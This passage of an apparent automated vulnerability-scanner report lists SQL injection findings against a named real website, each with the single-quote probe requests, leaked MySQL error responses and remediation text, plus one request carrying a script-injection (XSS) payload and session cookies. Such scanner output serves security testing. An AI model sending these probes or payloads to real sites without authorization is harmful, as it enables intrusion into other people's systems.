<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /index.php?option=com_chronocontact''&chronoformname=CGPage HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The view parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the view parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /index.php?option=com_content&view=category'&layout=blog&id=98&Itemid=111 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /index.php?option=com_content&view=category''&layout=blog&id=98&Itemid=111 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:56 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.95. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/more/digital-publications
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /more/digital-publications?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /more/digital-publications?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.96. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/more/the-masters-series
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /more/the-masters-series?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:01 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /more/the-masters-series?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.97. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.98. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/coastwise
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/coastwise?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/coastwise?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:31 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.99. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/dispatches
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/dispatches?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/dispatches?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.100. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/home-waters
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/home-waters?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/home-waters?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.101. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/mishaps-a-rescues
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/mishaps-a-rescues?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/mishaps-a-rescues?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:32 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:03:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=lav3f1huhlc18qqits80hjrgg7; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:03:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E'' AND cooki' at line 1</font> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
